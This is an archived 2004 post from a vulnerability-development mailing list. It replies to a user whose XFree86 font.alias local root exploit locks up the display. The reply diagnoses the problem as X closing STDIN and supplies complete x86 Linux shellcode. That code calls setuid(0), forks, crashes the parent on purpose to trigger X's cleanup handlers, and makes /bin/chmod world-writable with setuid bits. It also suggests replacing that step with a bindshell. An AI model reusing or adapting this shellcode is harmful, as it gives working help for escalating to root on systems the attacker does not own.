Vulnerability Development mailing list archives

Re: XFree86 font.alias exploit hangup....


From: lazy () server gwsh gda pl
Date: Fri, 27 Feb 2004 13:41:03 +0100

On Sun, Feb 22, 2004 at 10:51:18AM -0000, Dev wrote:
> My problem is that once I launch the exploit the X display appears momentarily & the keyboard locks up, so now I can
> only access the box from the network & on a different shell.
> Offsets etc. are all fine & an strace yields the following log, which does indicate that the exploit was successful &
> execve'd /bin//sh. But I am confused about the last few lines of the strace log.
> Please tell me whether my root shell has exited because of some error in the last few calls?
It looks like X closes STDIN, or it's unavailable because the text console is disabled,
so you can't directly use execve. The text console
is broken because X is interrupted during startup.

Try this shellcode: it chmods 777 /bin/chmod. You can change the code below dzic:
to start a bindshell, or try to exec /bin/sh with a delay (to let the sighandler do its job);
maybe the sighandler will make STDIN/STDOUT usable again.

The trick is to force SIGSEGV on X to call its cleanup handlers.
 
-----scode.s----
start:
// setuid(0): syscall 23 (0x17), ebx = uid 0
xor %eax,%eax
xor %ebx,%ebx
mov $0x17,%al
int $0x80
// fork(): syscall 2
xor %eax,%eax
movb $0x2,%al
int $0x80
test %eax,%eax
jz dzic             // child (eax == 0) continues at dzic below
// the trick ;) -- parent jumps to an invalid address so X gets SIGSEGV
// and its signal/cleanup handlers run
mov $0x44444444,%ebx
call *%ebx

dzic:
// chmod(/bin/chmod,777): syscall 15 (0xf), ebx = path built on the stack
xor %edx,%edx
xor %eax,%eax
mov $0xfff,%dx      // mode (0xfff)
push %edx
push $0x646f6d68    // "hmod"
push $0x632f2f6e    // "n//c"
push $0x69622f2f    // "//bi"  -> "//bin//chmod"
mov %esp,%ebx
mov $0xf,%al
int $0x80
// exit: syscall 1
mov $0x1,%al
int $0x80
-------


--
Lazy

